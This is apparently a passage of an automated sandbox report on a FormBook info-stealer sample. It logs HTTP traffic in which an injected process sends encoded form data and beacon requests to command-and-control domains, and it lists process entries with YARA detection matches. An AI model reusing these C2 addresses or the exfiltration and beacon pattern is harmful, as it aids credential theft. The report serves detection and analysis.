                                                                                                                                  Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 30 36 32 38 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                                                                  Data Ascii: 54{"msg":"/0628/","code":401}
                                                                                                                                   Oct 22, 2024 22:59:33.673578024 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 0


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   49 | 192.168.2.5 | 53252 | 94.23.162.163 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:59:39.097224951 CEST | 768 | OUT | POST /9vwi/ HTTP/1.1
                                                                                                                                  Host: www.productanalytics.pro
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.productanalytics.pro
                                                                                                                                  Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 53 4c 58 52 73 6f 46 34 6a 65 35 4a 45 67 36 34 73 68 38 56 39 49 6d 64 6d 35 45 79 33 2f 32 42 50 36 59 78 56 5a 4f 65 34 36 38 76 5a 47 46 47 34 56 63 48 61 71 53 45 63 75 58 42 61 30 33 33 59 32 77 46 57 41 66 43 4a 44 5a 37 48 6d 36 35 78 51 2f 71 58 39 49 70 68 6a 4f 50 65 74 58 77 76 2b 61 5a 68 48 34 78 59 6c 68 55 70 34 4a 32 44 65 33 36 68 31 79 51 67 68 6b 4f 54 32 44 35 44 49 44 49 6d 43 79 75 54 54 64 68 44 4e 30 65 64 45 78 38 6d 51 37 2f 4e 75 62 77 2b 79 70 74 4d 65 31 37 52 53 44 58 38 67 73 63 57 57 31 65 49 57 46 7a 47 35 30 4b 6d 7a 30 3d
                                                                                                                                  Data Ascii: DrelH=qxonD4gQFvLySLXRsoF4je5JEg64sh8V9Imdm5Ey3/2BP6YxVZOe468vZGFG4VcHaqSEcuXBa033Y2wFWAfCJDZ7Hm65xQ/qX9IphjOPetXwv+aZhH4xYlhUp4J2De36h1yQghkOT2D5DIDImCyuTTdhDN0edEx8mQ7/Nubw+yptMe17RSDX8gscWW1eIWFzG50Kmz0=


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   50 | 192.168.2.5 | 53253 | 94.23.162.163 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:59:41.895153999 CEST | 788 | OUT | POST /9vwi/ HTTP/1.1
                                                                                                                                  Host: www.productanalytics.pro
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.productanalytics.pro
                                                                                                                                  Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 54 76 54 52 75 4a 46 34 6d 2b 35 4b 64 67 36 34 6c 42 39 39 39 49 69 64 6d 37 6f 69 33 4a 65 42 4d 66 6b 78 57 64 61 65 2f 36 38 76 57 6d 45 4f 6c 46 63 4d 61 72 75 32 63 73 44 42 61 30 54 33 59 30 34 46 57 7a 33 4e 62 44 5a 39 50 47 36 33 31 51 2f 71 58 39 49 70 68 6a 4b 6c 65 70 7a 77 76 76 71 5a 75 43 4d 77 45 56 68 58 75 34 4a 32 48 65 33 2b 68 31 79 35 67 67 34 30 54 79 7a 35 44 4a 54 49 6d 51 61 74 64 6a 64 37 4d 74 31 52 4d 52 4d 7a 67 68 50 4f 4d 6f 71 66 6e 30 64 46 45 49 59 52 4c 77 4c 2f 76 41 41 6b 47 46 39 70 5a 6d 6b 61 63 61 6b 36 34 6b 69 73 69 4f 37 37 48 47 36 47 56 7a 33 61 47 4e 55 52 46 4d 32 38
                                                                                                                                  Data Ascii: DrelH=qxonD4gQFvLyTvTRuJF4m+5Kdg64lB999Iidm7oi3JeBMfkxWdae/68vWmEOlFcMaru2csDBa0T3Y04FWz3NbDZ9PG631Q/qX9IphjKlepzwvvqZuCMwEVhXu4J2He3+h1y5gg40Tyz5DJTImQatdjd7Mt1RMRMzghPOMoqfn0dFEIYRLwL/vAAkGF9pZmkacak64kisiO77HG6GVz3aGNURFM28


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   51 | 192.168.2.5 | 53254 | 94.23.162.163 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:59:44.436575890 CEST | 1805 | OUT | POST /9vwi/ HTTP/1.1
                                                                                                                                  Host: www.productanalytics.pro
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.productanalytics.pro
                                                                                                                                  Referer: http://www.productanalytics.pro/9vwi/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 71 78 6f 6e 44 34 67 51 46 76 4c 79 54 76 54 52 75 4a 46 34 6d 2b 35 4b 64 67 36 34 6c 42 39 39 39 49 69 64 6d 37 6f 69 33 4a 6d 42 4d 74 63 78 56 36 32 65 2b 36 38 76 66 47 45 4e 6c 46 63 52 61 71 47 79 63 73 50 52 61 32 62 33 5a 57 41 46 51 43 33 4e 52 44 5a 39 44 6d 36 36 78 51 2f 2f 58 39 35 69 68 6a 61 6c 65 70 7a 77 76 74 79 5a 70 58 34 77 58 46 68 55 70 34 4a 36 44 65 33 47 68 31 61 49 67 67 39 57 55 42 37 35 43 6f 6a 49 71 44 79 74 66 44 64 6c 4a 74 30 4f 4d 52 4a 7a 67 68 69 33 4d 73 69 6d 6e 7a 70 46 55 4f 41 4d 4f 6a 57 6d 72 47 59 66 4b 69 39 2b 5a 6d 38 52 5a 59 70 4b 79 33 32 51 2f 66 58 6b 48 47 65 42 5a 51 57 55 61 72 49 68 49 4c 4c 79 50 77 5a 49 34 58 73 61 54 4f 4b 4d 67 63 79 6c 68 6b 58 47 70 32 68 77 57 35 71 38 67 6a 7a 79 41 50 56 61 65 6b 48 47 45 70 38 75 77 74 41 35 48 62 30 5a 62 41 6b 75 68 79 54 79 71 6a 4f 49 57 69 49 47 6a 42 72 4f 70 78 43 71 45 39 4f 6b 74 7a 72 33 45 6d 48 62 68 6c 61 4d 68 4a 69 48 2f 63 36 58 4d 42 71 4d 50 33 35 69 75 75 4b 76 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=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 [TRUNCATED]


                                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                   52 | 192.168.2.5 | 53255 | 94.23.162.163 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                                   Oct 22, 2024 22:59:47.205121040 CEST | 489 | OUT | GET /9vwi/?Sx=gnM4ZH&DrelH=nzAHAMVHTcHZef2dtsV+gZN2Jg+zshsJ+9OWn5ktx4T+L9EMDtm05+R8HUsMmhIjUd2KUuTNFTfuNiAYWk32ZlZ5K0mO0jPWZdMrvyGAaZ//vvCziC5VbEt1mIxURveK1Q== HTTP/1.1
                                                                                                                                  Host: www.productanalytics.pro
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                   Oct 22, 2024 22:59:48.035028934 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:47 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 7468
                                                                                                                                  Last-Modified: Thu, 08 Apr 2021 14:34:06 GMT
                                                                                                                                  Connection: close
                                                                                                                                  ETag: "606f145e-1d2c"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 6f 64 70 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 20 70 65 6e 64 69 6e 67 20 49 43 41 4e 4e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 61 6e 64 20 69 73 20 73 75 73 70 65 6e 64 65 64 2e 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 65 79 2d 53 79 73 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp" /> <meta name="description" content="This domain has a pending ICANN verification and is suspended." /> <meta name="keywords" content="" /> <meta name="author" content="Key-Systems GmbH | CM" /> <meta name="publisher" content="Key-Systems GmbH" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/screen.css"> <link rel="shortcut icon" href="assets/img/favicon.png"> <title>Contact Verification Suspension Page</title></head><body><header><div class="overlay bright"></div><div class="container"><div class="heading"><div class="row"><
                                                                                                                                   Oct 22, 2024 22:59:48.035088062 CEST | 1236 | IN | Data Raw: 68 31 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 75 73 70 65 6e 64 65 64 20 64 75 65 20 74 6f 20 6e 6f 6e 2d 63 6f 6d 70 6c 65 74 69 6f 6e 20 6f 66 20 61 6e 20 49 43 41 4e 4e 2d 6d 61 6e 64 61 74 65 64 20 63 6f 6e 74 61
                                                                                                                                  Data Ascii: h1>This domain has been suspended due to non-completion of an ICANN-mandated contact verification.</h1><p>As part of the ongoing effort to improve contact quality, the Internet Corporation for Assigned Names and Numbers (ICANN) requires
                                                                                                                                   Oct 22, 2024 22:59:48.035125017 CEST | 1236 | IN | Data Raw: 6f 6d 61 69 6e 20 72 65 67 69 73 74 72 61 6e 74 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 6f 72 20 63 68 61 6e 67 65 64 20 62 75 74 20 6e 6f 74 20 76 65 72 69 66 69 65 64 20 79 65 74 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 0d 0a 09 09
                                                                                                                                  Data Ascii: omain registrant has been modified or changed but not verified yet.</span><br>Changing the email address of the domain registrant requires a verification.</li><li><i class="fa fa-play"></i><span class="bold">The domain has recent
                                                                                                                                   Oct 22, 2024 22:59:48.035202026 CEST | 1236 | IN | Data Raw: 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 5f 6c 65 66 74 22 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09
                                                                                                                                  Data Ascii: v class="icon_left"><span class="fa fa-check-circle"></span></div><div class="slice_content"><p><span class="bold">Click the link provided in the verification email sent to you by your Registrar or direct service provide
                                                                                                                                   Oct 22, 2024 22:59:48.035238028 CEST | 848 | IN | Data Raw: 72 2c 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 70 72 6f 76 69 64 65 72 20 6d 69 67 68 74 20 70 72 6f 76 69 64 65 20 74 68 65 20 72 65 73 70 65 63 74 69 76 65 20 74 72 69 67 67 65 72 20 63 6f 64 65 20 75 6e 64 65 72 20 63 65 72 74 61 69 6e 20 63 6f
                                                                                                                                  Data Ascii: r, your domain provider might provide the respective trigger code under certain conditions. This trigger code can be entered on <a href="http://emailverification.info/">http://emailverification.info/</a> to verify your registrant contact data
                                                                                                                                   Oct 22, 2024 22:59:48.035271883 CEST | 1236 | IN | Data Raw: 65 72 69 66 79 20 72 65 67 69 73 74 72 61 6e 74 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 65 73 20 61 6e 64 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 69 74 68 69 6e 20 31 35 20 64 61 79 73 20 61 66 74 65 72 20 72 65 67 69
                                                                                                                                  Data Ascii: erify registrant email addresses and contact information within 15 days after registration and incoming transfers. If registrant data is not verified in time, ICANN mandates registrars to suspend the corresponding website of the affected domai
                                                                                                                                   Oct 22, 2024 22:59:48.035365105 CEST | 684 | IN | Data Raw: 6c 61 73 73 3d 22 62 6f 6c 64 22 3e 48 6f 77 20 6c 6f 6e 67 20 64 6f 65 73 20 69 74 20 74 61 6b 65 20 75 6e 74 69 6c 20 6d 79 20 77 65 62 73 69 74 65 20 63 6f 6d 65 73 20 62 61 63 6b 20 6f 6e 6c 69 6e 65 20 61 66 74 65 72 20 74 68 65 20 73 75 73
                                                                                                                                  Data Ascii: lass="bold">How long does it take until my website comes back online after the suspension is removed?</span><br>After the verification has been successfully completed the suspension is removed within 30 minutes. Please keep in mind that
                                                                                                                                   Oct 22, 2024 22:59:48.375241995 CEST | 684 | IN | Data Raw: 6c 61 73 73 3d 22 62 6f 6c 64 22 3e 48 6f 77 20 6c 6f 6e 67 20 64 6f 65 73 20 69 74 20 74 61 6b 65 20 75 6e 74 69 6c 20 6d 79 20 77 65 62 73 69 74 65 20 63 6f 6d 65 73 20 62 61 63 6b 20 6f 6e 6c 69 6e 65 20 61 66 74 65 72 20 74 68 65 20 73 75 73
                                                                                                                                  Data Ascii: lass="bold">How long does it take until my website comes back online after the suspension is removed?</span><br>After the verification has been successfully completed the suspension is removed within 30 minutes. Please keep in mind that
                                                                                                                                   Oct 22, 2024 22:59:48.375952959 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:47 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 7468
                                                                                                                                  Last-Modified: Thu, 08 Apr 2021 14:34:06 GMT
                                                                                                                                  Connection: close
                                                                                                                                  ETag: "606f145e-1d2c"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 6f 64 70 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 20 70 65 6e 64 69 6e 67 20 49 43 41 4e 4e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 61 6e 64 20 69 73 20 73 75 73 70 65 6e 64 65 64 2e 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 65 79 2d 53 79 73 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp" /> <meta name="description" content="This domain has a pending ICANN verification and is suspended." /> <meta name="keywords" content="" /> <meta name="author" content="Key-Systems GmbH | CM" /> <meta name="publisher" content="Key-Systems GmbH" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/screen.css"> <link rel="shortcut icon" href="assets/img/favicon.png"> <title>Contact Verification Suspension Page</title></head><body><header><div class="overlay bright"></div><div class="container"><div class="heading"><div class="row"><


                                                                                                                                  Session ID: 53 | Source IP: 192.168.2.5 | Source Port: 53256 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 1536 | Process: C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                                  Oct 22, 2024 23:00:04.581003904 CEST | 482 | OUT | GET /qw71/?DrelH=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxHl13RnV9fZ86lxbh4XUe9xgDJH4eQTI99hcUlaXwNdeqKg==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.itemsort.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 23:00:05.305921078 CEST | 924 | IN | HTTP/1.1 404
                                                                                                                                  Date: Tue, 22 Oct 2024 21:00:05 GMT
                                                                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wUzmk3j2UlzYcPMXIRYSdG8TUWpcEAQq36sSUUHYznzPVSuRer2egvSHLcUNBDTNEV1qWAUFX4YIHJWfspQGD7OD5GvZGPjdZPiDbrPPrtYRGH4g8fIss2MS3Oz%2F8x%2BUI9R6qQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d6c6a33fafae7f7-DFW
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>0


                                                                                                                                  Target ID:0
                                                                                                                                  Start time:16:55:58
                                                                                                                                  Start date:22/10/2024
                                                                                                                                  Path:C:\Users\user\Desktop\Doc 784-01965670.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Doc 784-01965670.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:1'321'247 bytes
                                                                                                                                  MD5 hash:F9D3E00CDE42773F49276BFD202813F5
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:16:55:59
                                                                                                                                  Start date:22/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Doc 784-01965670.exe"
                                                                                                                                  Imagebase:0x9c0000
                                                                                                                                  File size:46'504 bytes
                                                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:16:56:08
                                                                                                                                  Start date:22/10/2024
                                                                                                                                  Path:C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe"
                                                                                                                                  Imagebase:0xc20000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:16:56:10
                                                                                                                                  Start date:22/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\SysWOW64\schtasks.exe"
                                                                                                                                  Imagebase:0x990000
                                                                                                                                  File size:187'904 bytes
                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:16:56:23
                                                                                                                                  Start date:22/10/2024
